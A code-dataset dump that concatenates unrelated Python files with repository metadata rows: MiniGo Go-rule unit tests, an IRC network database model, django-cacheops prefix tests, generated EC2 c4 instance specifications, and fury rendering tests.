self.assertEqual(left_group.liberties, parse_kgs_coords_set('A9 B8 A7'))
right_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('D8')]]
self.assertEqual(right_group.stones, parse_kgs_coords_set('D8'))
self.assertEqual(right_group.liberties, parse_kgs_coords_set('D9 C8 E8 D7'))
top_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B9')]]
self.assertEqual(top_group.stones, parse_kgs_coords_set('B9 C9'))
self.assertEqual(top_group.liberties, parse_kgs_coords_set('A9 D9 B8 C8'))
bottom_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B7')]]
self.assertEqual(bottom_group.stones, parse_kgs_coords_set('B7 C7'))
self.assertEqual(bottom_group.liberties, parse_kgs_coords_set('B8 C8 A7 D7 B6 C6'))
liberty_cache = lib_tracker.liberty_cache
for stone in top_group.stones:
self.assertEqual(liberty_cache[stone], 4, str(stone))
for stone in left_group.stones:
self.assertEqual(liberty_cache[stone], 3, str(stone))
for stone in right_group.stones:
self.assertEqual(liberty_cache[stone], 4, str(stone))
for stone in bottom_group.stones:
self.assertEqual(liberty_cache[stone], 6, str(stone))
for stone in captured:
self.assertEqual(liberty_cache[stone], 0, str(stone))
def test_capture_multiple_groups(self):
board = test_utils.load_board('''
.OX......
OXX......
XX.......
''' + EMPTY_ROW * 6)
lib_tracker = LibertyTracker.from_board(board)
captured = lib_tracker.add_stone(BLACK, parse_kgs_coords('A9'))
self.assertEqual(len(lib_tracker.groups), 2)
self.assertEqual(captured, parse_kgs_coords_set('B9 A8'))
corner_stone = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
self.assertEqual(corner_stone.stones, parse_kgs_coords_set('A9'))
self.assertEqual(corner_stone.liberties, parse_kgs_coords_set('B9 A8'))
surrounding_stones = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('C9')]]
self.assertEqual(surrounding_stones.stones, parse_kgs_coords_set('C9 B8 C8 A7 B7'))
self.assertEqual(surrounding_stones.liberties, parse_kgs_coords_set('B9 D9 A8 D8 C7 A6 B6'))
liberty_cache = lib_tracker.liberty_cache
for stone in corner_stone.stones:
self.assertEqual(liberty_cache[stone], 2, str(stone))
for stone in surrounding_stones.stones:
self.assertEqual(liberty_cache[stone], 7, str(stone))
def test_same_friendly_group_neighboring_twice(self):
board = test_utils.load_board('''
XX.......
X........
''' + EMPTY_ROW * 7)
lib_tracker = LibertyTracker.from_board(board)
captured = lib_tracker.add_stone(BLACK, parse_kgs_coords('B8'))
self.assertEqual(len(lib_tracker.groups), 1)
sole_group_id = lib_tracker.group_index[parse_kgs_coords('A9')]
sole_group = lib_tracker.groups[sole_group_id]
self.assertEqual(sole_group.stones, parse_kgs_coords_set('A9 B9 A8 B8'))
self.assertEqual(sole_group.liberties, parse_kgs_coords_set('C9 C8 A7 B7'))
self.assertEqual(captured, set())
def test_same_opponent_group_neighboring_twice(self):
board = test_utils.load_board('''
XX.......
X........
''' + EMPTY_ROW * 7)
lib_tracker = LibertyTracker.from_board(board)
captured = lib_tracker.add_stone(WHITE, parse_kgs_coords('B8'))
self.assertEqual(len(lib_tracker.groups), 2)
black_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
self.assertEqual(black_group.stones, parse_kgs_coords_set('A9 B9 A8'))
self.assertEqual(black_group.liberties, parse_kgs_coords_set('C9 A7'))
white_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B8')]]
self.assertEqual(white_group.stones, parse_kgs_coords_set('B8'))
self.assertEqual(white_group.liberties, parse_kgs_coords_set('C8 B7'))
self.assertEqual(captured, set())
class TestPosition(test_utils.MiniGoUnitTest):
def test_passing(self):
start_position = Position(
board=TEST_BOARD,
n=0,
komi=6.5,
caps=(1, 2),
ko=parse_kgs_coords('A1'),
recent=tuple(),
to_play=BLACK,
)
expected_position = Position(
board=TEST_BOARD,
n=1,
komi=6.5,
caps=(1, 2),
ko=None,
recent=(PlayerMove(BLACK, None),),
to_play=WHITE,
)
pass_position = start_position.pass_move()
self.assertEqualPositions(pass_position, expected_position)
def test_flipturn(self):
start_position = Position(
board=TEST_BOARD,
n=0,
komi=6.5,
caps=(1, 2),
ko=parse_kgs_coords('A1'),
recent=tuple(),
to_play=BLACK,
)
expected_position = Position(
board=TEST_BOARD,
n=0,
komi=6.5,
caps=(1, 2),
ko=None,
recent=tuple(),
to_play=WHITE,
)
flip_position = start_position.flip_playerturn()
self.assertEqualPositions(flip_position, expected_position)
def test_is_move_suicidal(self):
board = test_utils.load_board('''
...O.O...
....O....
XO.....O.
OXO...OXO
O.XO.OX.O
OXO...OOX
XO.......
......XXO
.....XOO.
''')
position = Position(
board=board,
to_play=BLACK,
)
suicidal_moves = parse_kgs_coords_set('E9 H5')
nonsuicidal_moves = parse_kgs_coords_set('B5 J1 A9')
for move in suicidal_moves:
assert(position.board[move] == go.EMPTY) #sanity check my coordinate input
self.assertTrue(position.is_move_suicidal(move), str(move))
for move in nonsuicidal_moves:
assert(position.board[move] == go.EMPTY) #sanity check my coordinate input
self.assertFalse(position.is_move_suicidal(move), str(move))
def test_legal_moves(self):
board = test_utils.load_board('''
.O.O.XOX.
O..OOOOOX
......O.O
OO.....OX
XO.....X.
.O.......
OX.....OO
XX...OOOX
.....O.X.
''')
position = Position(board=board, to_play=BLACK)
illegal_moves = parse_kgs_coords_set('A9 E9 J9')
legal_moves = parse_kgs_coords_set('A4 G1 J1 H7') | {None}
for move in illegal_moves:
with self.subTest(type='illegal', move=move):
self.assertFalse(position.is_move_legal(move))
for move in legal_moves:
with self.subTest(type='legal', move=move):
self.assertTrue(position.is_move_legal(move))
# check that the bulk legal test agrees with move-by-move illegal test.
bulk_legality = position.all_legal_moves()
for i, bulk_legal in enumerate(bulk_legality):
with self.subTest(type='bulk', move=unflatten_coords(i)):
self.assertEqual(bulk_legal, position.is_move_legal(unflatten_coords(i)))
# flip the colors and check that everything is still (il)legal
position = Position(board=-board, to_play=WHITE)
for move in illegal_moves:
with self.subTest(type='illegal', move=move):
self.assertFalse(position.is_move_legal(move))
for move in legal_moves:
with self.subTest(type='legal', move=move):
self.assertTrue(position.is_move_legal(move))
bulk_legality = position.all_legal_moves()
for i, bulk_legal in enumerate(bulk_legality):
with self.subTest(type='bulk', move=unflatten_coords(i)):
self.assertEqual(bulk_legal, position.is_move_legal(unflatten_coords(i)))
def test_move(self):
start_position = Position(
board=TEST_BOARD,
n=0,
komi=6.5,
caps=(1, 2),
ko=None,
recent=tuple(),
to_play=BLACK,
)
expected_board = test_utils.load_board('''
.XX....OO
X........
''' + EMPTY_ROW * 7)
expected_position = Position(
board=expected_board,
n=1,
komi=6.5,
caps=(1, 2),
ko=None,
recent=(PlayerMove(BLACK, parse_kgs_coords('C9')),),
to_play=WHITE,
)
actual_position = start_position.play_move(parse_kgs_coords('C9'))
self.assertEqualPositions(actual_position, expected_position)
expected_board2 = test_utils.load_board('''
.XX....OO
X.......O
''' + EMPTY_ROW * 7)
expected_position2 = Position(
board=expected_board2,
n=2,
komi=6.5,
caps=(1, 2),
ko=None,
recent=(PlayerMove(BLACK, parse_kgs_coords('C9')), PlayerMove(WHITE, parse_kgs_coords('J8'))),
to_play=BLACK,
)
actual_position2 = actual_position.play_move(parse_kgs_coords('J8'))
self.assertEqualPositions(actual_position2, expected_position2)
def test_move_with_capture(self):
start_board = test_utils.load_board(EMPTY_ROW * 5 + '''
XXXX.....
XOOX.....
O.OX.....
OOXX.....
''')
start_position = Position(
board=start_board,
n=0,
komi=6.5,
caps=(1, 2),
ko=None,
recent=tuple(),
to_play=BLACK,
)
expected_board = test_utils.load_board(EMPTY_ROW * 5 + '''
XXXX.....
X..X.....
.X.X.....
..XX.....
''')
expected_position = Position(
board=expected_board,
n=1,
komi=6.5,
caps=(7, 2),
ko=None,
recent=(PlayerMove(BLACK, parse_kgs_coords('B2')),),
to_play=WHITE,
)
actual_position = start_position.play_move(parse_kgs_coords('B2'))
self.assertEqualPositions(actual_position, expected_position)
def test_ko_move(self):
start_board = test_utils.load_board('''
.OX......
OX.......
''' + EMPTY_ROW * 7)
start_position = Position(
board=start_board,
n=0,
komi=6.5,
caps=(1, 2),
ko=None,
recent=tuple(),
to_play=BLACK,
)
expected_board = test_utils.load_board('''
X.X......
OX.......
''' + EMPTY_ROW * 7)
expected_position = Position(
board=expected_board,
n=1,
komi=6.5,
caps=(2, 2),
ko=parse_kgs_coords('B9'),
recent=(PlayerMove(BLACK, parse_kgs_coords('A9')),),
to_play=WHITE,
)
actual_position = start_position.play_move(parse_kgs_coords('A9'))
self.assertEqualPositions(actual_position, expected_position)
# Check that retaking ko is illegal until two intervening moves
with self.assertRaises(go.IllegalMove):
actual_position.play_move(parse_kgs_coords('B9'))
pass_twice = actual_position.pass_move().pass_move()
ko_delayed_retake = pass_twice.play_move(parse_kgs_coords('B9'))
expected_position = Position(
board=start_board,
n=4,
komi=6.5,
caps=(2, 3),
ko=parse_kgs_coords('A9'),
recent=(
PlayerMove(BLACK, parse_kgs_coords('A9')),
PlayerMove(WHITE, None),
PlayerMove(BLACK, None),
PlayerMove(WHITE, parse_kgs_coords('B9'))),
to_play=BLACK,
)
self.assertEqualPositions(ko_delayed_retake, expected_position)
def test_is_game_over(self):
root = go.Position()
self.assertFalse(root.is_game_over())
first_pass = root.play_move(None)
self.assertFalse(first_pass.is_game_over())
second_pass = first_pass.play_move(None)
self.assertTrue(second_pass.is_game_over())
def test_scoring(self):
board = test_utils.load_board('''
.XX......
OOXX.....
OOOX...X.
OXX......
OOXXXXXX.
OOOXOXOXX
.O.OOXOOX
.O.O.OOXX
......OOO
''')
position = Position(
board=board,
n=54,
komi=6.5,
caps=(2, 5),
ko=None,
recent=tuple(),
to_play=BLACK,
)
expected_score = 1.5
self.assertEqual(position.score(), expected_score)
board = test_utils.load_board('''
XXX......
OOXX.....
OOOX...X.
OXX......
OOXXXXXX.
OOOXOXOXX
.O.OOXOOX
.O.O.OOXX
......OOO
''')
position = Position(
board=board,
n=55,
komi=6.5,
caps=(2, 5),
ko=None,
recent=tuple(),
to_play=WHITE,
)
expected_score = 2.5
self.assertEqual(position.score(), expected_score)
def test_replay_position(self):
sgf_positions = list(sgf_wrapper.replay_sgf(NO_HANDICAP_SGF))
initial = sgf_positions[0]
self.assertEqual(initial.result, go.WHITE)
final = sgf_positions[-1].position.play_move(sgf_positions[-1].next_move)
# sanity check to ensure we're working with the right position
final_board = test_utils.load_board('''
.OXX.....
O.OX.X...
.OOX.....
OOOOXXXXX
XOXXOXOOO
XOOXOO.O.
XOXXXOOXO
XXX.XOXXO
X..XOO.O.
''')
expected_final_position = go.Position(
final_board,
n=62,
komi=6.5,
caps=(3, 2),
ko=None,
recent=tuple(),
to_play=go.BLACK
)
self.assertEqualPositions(expected_final_position, final)
self.assertEqual(final.n, len(final.recent))
replayed_positions = list(go.replay_position(final))
for sgf_pos, replay_pos in zip(sgf_positions, replayed_positions):
self.assertEqualPositions(sgf_pos.position, replay_pos.position)
| 39.939551 | 469 | 0.597881 |
79554cbcd92e1d5bd8be4987e8f7c8ac4cba51f8 | 73 | py | Python | oremda/messengers/base/__init__.py | cclauss/oremda | b04e58fbb8c9c08a928f876ae1358462f3ef311d | [
"BSD-3-Clause"
] | 11 | 2021-09-01T23:10:51.000Z | 2022-03-20T07:39:37.000Z | oremda/messengers/base/__init__.py | cclauss/oremda | b04e58fbb8c9c08a928f876ae1358462f3ef311d | [
"BSD-3-Clause"
] | 22 | 2021-05-18T14:10:27.000Z | 2021-10-04T15:06:27.000Z | oremda/messengers/base/__init__.py | cclauss/oremda | b04e58fbb8c9c08a928f876ae1358462f3ef311d | [
"BSD-3-Clause"
] | 2 | 2021-09-01T22:11:13.000Z | 2021-10-30T09:12:36.000Z | from .messenger import BaseMessenger
__all__ = [
"BaseMessenger",
]
| 12.166667 | 36 | 0.712329 |
79554d6e35f85330788798c8a78b79e7c9e2182b | 3,298 | py | Python | ircb/models/network.py | waartaa/pyirc | 18381b167529ee56d1c5d5d22f857bb27692c397 | [
"MIT"
] | 54 | 2015-07-06T10:03:43.000Z | 2020-12-27T06:08:02.000Z | ircb/models/network.py | waartaa/pyirc | 18381b167529ee56d1c5d5d22f857bb27692c397 | [
"MIT"
] | 68 | 2015-11-22T13:56:59.000Z | 2019-01-24T18:19:28.000Z | ircb/models/network.py | waartaa/pyirc | 18381b167529ee56d1c5d5d22f857bb27692c397 | [
"MIT"
] | 15 | 2015-08-13T04:41:31.000Z | 2021-09-30T20:01:38.000Z | # -*- coding: utf-8 -*-
import datetime
from hashlib import md5
import sqlalchemy as sa
from sqlalchemy_utils import ChoiceType, Choice
from ircb.models.lib import Base, get_session
from ircb.models.user import User
from ircb.config import settings
NETWORK_STATUS_TYPES = (
('0', 'Connecting'),
('1', 'Connected'),
('2', 'Disconnecting'),
('3', 'Disconnected')
)
SSL_VERIFY_CHOICES = (
('CERT_NONE', 'No certs required'),
('CERT_OPTIONAL', 'Optional cert'),
('CERT_REQUIRED', 'Cert required')
)
session = get_session()
def _create_access_token(user_id, network_name):
user = session.query(User).get(user_id)
return md5('{}{}{}{}'.format(settings.SECRET_KEY,
user.username,
network_name,
datetime.datetime.utcnow()).encode()
).hexdigest()
class Network(Base):
__tablename__ = 'networks'
__table_args__ = (
sa.UniqueConstraint('user_id', 'name'),
)
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String(255), nullable=False)
nickname = sa.Column(sa.String(20), nullable=False)
hostname = sa.Column(sa.String(100), nullable=False)
port = sa.Column(sa.Integer, nullable=False)
realname = sa.Column(sa.String(100), nullable=False, default='')
username = sa.Column(sa.String(50), nullable=False, default='')
password = sa.Column(sa.String(100), nullable=False, default='')
usermode = sa.Column(sa.String(1), nullable=False, default='0')
ssl = sa.Column(sa.Boolean(), default=False)
ssl_verify = sa.Column(ChoiceType(SSL_VERIFY_CHOICES),
default=Choice(*SSL_VERIFY_CHOICES[0]))
access_token = sa.Column(sa.String(100), nullable=False, unique=True,
default=lambda context: _create_access_token(
context.current_parameters['user_id'],
context.current_parameters['name']))
user_id = sa.Column(
sa.Integer(), sa.ForeignKey(User.id, ondelete='CASCADE'),
nullable=False)
# Runtime fields
current_nickname = sa.Column(sa.String(20), nullable=True)
status = sa.Column(ChoiceType(NETWORK_STATUS_TYPES),
default=Choice(*NETWORK_STATUS_TYPES[3]))
# Remote socket info
rhost = sa.Column(sa.String(100), nullable=True)
rport = sa.Column(sa.Integer(), nullable=True)
# Local socket info
lhost = sa.Column(sa.String(100), nullable=True)
lport = sa.Column(sa.Integer(), nullable=True)
# timestamps
created = sa.Column(sa.DateTime, default=datetime.datetime.utcnow)
last_updated = sa.Column(sa.DateTime,
default=datetime.datetime.utcnow)
def create_access_token(self):
return _create_access_token(self.user.id, self.name)
def to_dict(self, serializable=False):
d = super().to_dict()
ssl_verify = self.ssl_verify and self.ssl_verify if isinstance(
self.ssl_verify, str) else self.ssl_verify.code
status = self.status and (
self.status if isinstance(self.status, str) else self.status.code)
d['ssl_verify'] = ssl_verify
d['status'] = status
return d
| 35.462366 | 78 | 0.630079 |
79554de7aa7b1bc0da0087917eb588b16d591284 | 2,197 | py | Python | tests/cluster/tests_sharding.py | ParcelPerform/django-cacheops | 031c0a206fbafb304cda9302b9ebe33829383ddd | [
"BSD-3-Clause"
] | null | null | null | tests/cluster/tests_sharding.py | ParcelPerform/django-cacheops | 031c0a206fbafb304cda9302b9ebe33829383ddd | [
"BSD-3-Clause"
] | null | null | null | tests/cluster/tests_sharding.py | ParcelPerform/django-cacheops | 031c0a206fbafb304cda9302b9ebe33829383ddd | [
"BSD-3-Clause"
] | null | null | null | from django.core.exceptions import ImproperlyConfigured
from django.test import override_settings
from cacheops import cache, CacheMiss
from tests.models import Category, Post, Extra
from tests.utils import BaseTestCase
from cacheops.cluster.prefix_validator import InvalidPrefix
class PrefixTests(BaseTestCase):
databases = ('default', 'slave')
fixtures = ['basic']
def test_context(self):
prefix = ['']
with override_settings(CACHEOPS_PREFIX=lambda _: prefix[0]):
with self.assertNumQueries(2):
Category.objects.cache().count()
prefix[0] = 'x'
Category.objects.cache().count()
@override_settings(CACHEOPS_PREFIX=lambda q: q.db)
def test_db(self):
with self.assertNumQueries(1):
list(Category.objects.cache())
with self.assertNumQueries(1, using='slave'):
list(Category.objects.cache().using('slave'))
list(Category.objects.cache().using('slave'))
@override_settings(CACHEOPS_PREFIX=lambda q: q.table)
def test_table(self):
self.assertTrue(Category.objects.all()._cache_key().startswith('tests_category'))
with self.assertRaises(ImproperlyConfigured):
list(Post.objects.filter(category__title='Django').cache())
@override_settings(CACHEOPS_PREFIX=lambda q: q.table)
def test_self_join_tables(self):
list(Extra.objects.filter(to_tag__pk=1).cache())
@override_settings(CACHEOPS_PREFIX=lambda q: q.table)
def test_union_tables(self):
qs = Post.objects.filter(pk=1).union(Post.objects.filter(pk=2)).cache()
list(qs)
@override_settings(CACHEOPS_PREFIX=lambda q: f"{{{q.table}}}")
def test_union_tables(self):
with self.assertRaises(InvalidPrefix):
qs = Post.objects.filter(pk=1).union(Post.objects.filter(pk=2)).cache()
list(qs)
class SimpleCacheTests(BaseTestCase):
def test_prefix(self):
with override_settings(CACHEOPS_PREFIX=lambda _: 'a'):
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
with self.assertRaises(CacheMiss):
cache.get("key")
| 35.435484 | 89 | 0.667729 |
79554e3e7b260682160d5e1d80cd252b7466fc26 | 7,903 | py | Python | ec2_compare/internal/instance_type/c4.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | null | null | null | ec2_compare/internal/instance_type/c4.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | null | null | null | ec2_compare/internal/instance_type/c4.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | 1 | 2021-12-15T11:58:22.000Z | 2021-12-15T11:58:22.000Z |
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}] # noqa: E501
def get_instances_list() -> list:
'''Returns list EC2 instances with InstanceType = c4 .'''
# pylint: disable=all
return get
| 658.583333 | 7,713 | 0.732001 |
79554e661fb8d9852a3e16680f87d885146781a9 | 12,750 | py | Python | fury/tests/test_window.py | hnumair/fury | 6116e1c702c536aae0bb89a2b7e67b4aeef1acad | [
"BSD-3-Clause"
] | 1 | 2021-02-16T22:16:50.000Z | 2021-02-16T22:16:50.000Z | fury/tests/test_window.py | hnumair/fury | 6116e1c702c536aae0bb89a2b7e67b4aeef1acad | [
"BSD-3-Clause"
] | null | null | null | fury/tests/test_window.py | hnumair/fury | 6116e1c702c536aae0bb89a2b7e67b4aeef1acad | [
"BSD-3-Clause"
] | null | null | null | import os
import warnings
from tempfile import TemporaryDirectory as InTemporaryDirectory
import numpy as np
import numpy.testing as npt
import pytest
from fury import actor, window, io
from fury.testing import captured_output, assert_less_equal
from fury.decorators import skip_osx, skip_win
def test_scene():
scene = window.Scene()
npt.assert_equal(scene.size(), (0, 0))
# background color for scene (1, 0.5, 0)
# 0.001 added here to remove numerical errors when moving from float
# to int values
bg_float = (1, 0.501, 0)
# that will come in the image in the 0-255 uint scale
bg_color = tuple((np.round(255 * np.array(bg_float))).astype('uint8'))
scene.background(bg_float)
# window.show(scene)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr,
bg_color=bg_color,
colors=[bg_color, (0, 127, 0)])
npt.assert_equal(report.objects, 0)
npt.assert_equal(report.colors_found, [True, False])
axes = actor.axes()
scene.add(axes)
# window.show(scene)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr, bg_color)
npt.assert_equal(report.objects, 1)
scene.rm(axes)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr, bg_color)
npt.assert_equal(report.objects, 0)
scene.add(axes)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr, bg_color)
npt.assert_equal(report.objects, 1)
scene.rm_all()
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr, bg_color)
npt.assert_equal(report.objects, 0)
ren2 = window.Scene(bg_float)
ren2.background((0, 0, 0.))
report = window.analyze_scene(ren2)
npt.assert_equal(report.bg_color, (0, 0, 0))
ren2.add(axes)
report = window.analyze_scene(ren2)
npt.assert_equal(report.actors, 1)
ren2.rm(axes)
report = window.analyze_scene(ren2)
npt.assert_equal(report.actors, 0)
with captured_output() as (out, err):
scene.camera_info()
npt.assert_equal(out.getvalue().strip(),
'# Active Camera\n '
'Position (0.00, 0.00, 1.00)\n '
'Focal Point (0.00, 0.00, 0.00)\n '
'View Up (0.00, 1.00, 0.00)')
npt.assert_equal(err.getvalue().strip(), '')
def test_deprecated():
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always", DeprecationWarning)
scene = window.Renderer()
npt.assert_equal(scene.size(), (0, 0))
npt.assert_equal(len(w), 1)
